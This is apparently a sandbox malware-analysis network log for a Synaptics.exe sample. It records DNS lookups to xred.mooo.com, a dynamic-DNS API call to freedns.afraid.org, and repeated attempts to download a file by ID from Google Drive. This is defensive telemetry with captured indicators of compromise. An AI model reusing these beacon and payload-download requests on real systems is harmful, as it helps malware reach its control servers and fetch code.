                                                                                        Dec 5, 2024 22:51:58.414949894 CET4435006213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.431868076 CET50062443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.431910992 CET4435006213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.432281971 CET50062443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.432288885 CET4435006213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.774692059 CET4435006113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.778126955 CET4435006113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.778192043 CET50061443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.778297901 CET50061443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.778325081 CET4435006113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.778337955 CET50061443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.778342962 CET4435006113.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.781423092 CET50066443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.781493902 CET4435006613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.781692982 CET50066443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.781842947 CET50066443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.781860113 CET4435006613.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.851408005 CET4435006213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.853991985 CET4435006213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.854069948 CET50062443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.854113102 CET50062443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.854113102 CET50062443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.854132891 CET4435006213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.854144096 CET4435006213.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.857258081 CET50067443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.857292891 CET4435006713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:58.857388020 CET50067443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.857539892 CET50067443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:58.857549906 CET4435006713.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.177791119 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.178385973 CET50063443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.178411961 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.178865910 CET50063443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.178870916 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.533723116 CET4435006413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.576024055 CET50064443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.584748983 CET50064443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.584760904 CET4435006413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.585180998 CET50064443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.585186005 CET4435006413.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.815195084 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.818278074 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.818325043 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.818336964 CET50063443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.818384886 CET50063443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.887012959 CET4435006513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.935293913 CET50065443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.951050997 CET50063443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.951091051 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.951108932 CET50063443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.951116085 CET4435006313.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.953900099 CET50065443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.953907967 CET4435006513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.954631090 CET50065443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.954637051 CET4435006513.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.958995104 CET50068443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.959042072 CET4435006813.107.246.63192.168.2.5
                                                                                        Dec 5, 2024 22:51:59.959110022 CET50068443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:51:59.959343910 CET50068443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.396361113 CET50082443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.396512985 CET50082443192.168.2.513.107.246.63
                                                                                        Dec 5, 2024 22:52:05.396528006 CET4435008213.107.246.63192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 5, 2024 22:50:07.040992975 CET | 192.168.2.5 | 1.1.1.1 | 0x6060 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:07.932706118 CET | 192.168.2.5 | 1.1.1.1 | 0x3d9b | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:08.253122091 CET | 192.168.2.5 | 1.1.1.1 | 0x7b62 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:10.049166918 CET | 192.168.2.5 | 1.1.1.1 | 0x290c | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:12.187232971 CET | 192.168.2.5 | 1.1.1.1 | 0xba5d | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:19.129041910 CET | 192.168.2.5 | 1.1.1.1 | 0x55a6 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:26.093583107 CET | 192.168.2.5 | 1.1.1.1 | 0x9560 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:30.765558004 CET | 192.168.2.5 | 1.1.1.1 | 0xd596 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:36.702737093 CET | 192.168.2.5 | 1.1.1.1 | 0x1906 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:41.546648026 CET | 192.168.2.5 | 1.1.1.1 | 0xf1c9 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:47.376653910 CET | 192.168.2.5 | 1.1.1.1 | 0x7c87 | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 5, 2024 22:50:07.181075096 CET | 1.1.1.1 | 192.168.2.5 | 0x6060 | No error (0) | docs.google.com | | 172.217.19.238 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:08.249334097 CET | 1.1.1.1 | 192.168.2.5 | 0x3d9b | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:08.564068079 CET | 1.1.1.1 | 192.168.2.5 | 0x7b62 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:10.191699028 CET | 1.1.1.1 | 192.168.2.5 | 0x290c | No error (0) | drive.usercontent.google.com | | 142.250.181.129 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:12.325803041 CET | 1.1.1.1 | 192.168.2.5 | 0xba5d | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:16.994992018 CET | 1.1.1.1 | 192.168.2.5 | 0x903b | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 22:50:16.994992018 CET | 1.1.1.1 | 192.168.2.5 | 0x903b | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:19.267833948 CET | 1.1.1.1 | 192.168.2.5 | 0x55a6 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:26.231931925 CET | 1.1.1.1 | 192.168.2.5 | 0x9560 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:30.904238939 CET | 1.1.1.1 | 192.168.2.5 | 0xd596 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:36.841111898 CET | 1.1.1.1 | 192.168.2.5 | 0x1906 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:41.684202909 CET | 1.1.1.1 | 192.168.2.5 | 0xf1c9 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:50:47.514719963 CET | 1.1.1.1 | 192.168.2.5 | 0x7c87 | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 5, 2024 22:51:11.659380913 CET | 1.1.1.1 | 192.168.2.5 | 0x7dbe | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 5, 2024 22:51:11.659380913 CET | 1.1.1.1 | 192.168.2.5 | 0x7dbe | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
                                                                                        • docs.google.com
                                                                                        • drive.usercontent.google.com
                                                                                        • otelrules.azureedge.net
                                                                                        • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49712 | 69.42.215.252 | 80 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 22:50:08.685381889 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                        User-Agent: MyApp
                                                                                        Host: freedns.afraid.org
                                                                                        Cache-Control: no-cache
Dec 5, 2024 22:50:09.931361914 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Thu, 05 Dec 2024 21:50:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        X-Cache: MISS
                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49707 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 21:50:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-05 21:50:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-OMBAkMraEfB3H-cJDUjsJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 21:50:09 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-05 21:50:10 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:09 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-W4ZlpSj_Nirp-_3H0UF9XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49721 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 21:50:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-05 21:50:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:13 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JjpzRVbiclJ8NZWTh0B8fQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49720 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 21:50:13 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-05 21:50:13 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:13 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-d7PGA60vWaQSb5Pg52Jnyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49728 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-05 21:50:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
2024-12-05 21:50:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nTrC4M6xPUeauRVS_dJ2PQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        5 | 192.168.2.5 | 49729 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:15 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:16 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--ALrmlUBccNVJYAR0kT8Yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        6 | 192.168.2.5 | 49730 | 142.250.181.129 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:15 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-05 21:50:16 UTC | 1605 | IN | HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-aLUGkF0k6MmCTjeOuZBoTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC75Oc9nohzsmgWCW86BmmFlPezwFx3l5ROzFFZKSMwbzIPs5yjtYANnUrdXrdZqHPbpc8488J9Nbw
                                                                                        Server: UploadServer
                                                                                        Set-Cookie: NID=519=XAK-F-xT7EjeEQabmLXL3lyU7QzNh7EJ4EZ7QA0BOToG-xr5be7_Rh7oIUvEkfgRfufMwAslLXQCTczVKHZ5PNTjQd0D2eR5hjAiAkGYaCfmIbfcr8C6ZcLlgOUE6RPDg9koF4oy0R-5waNi_sTkf4O5c-frZCUvXEFXbRYaOcZwVnQYSGonaj3Y; expires=Fri, 06-Jun-2025 21:50:16 GMT; path=/; domain=.google.com; HttpOnly
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:16 UTC | 1605 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0510o3BM8FCATr_1Uj4R6g">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                        2024-12-05 21:50:16 UTC | 47 | IN | Data Ascii: server. <ins>That’s all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        7 | 192.168.2.5 | 49731 | 142.250.181.129 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:15 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-05 21:50:16 UTC | 1604 | IN | HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:16 GMT
                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                        Cross-Origin-Opener-Policy: same-origin
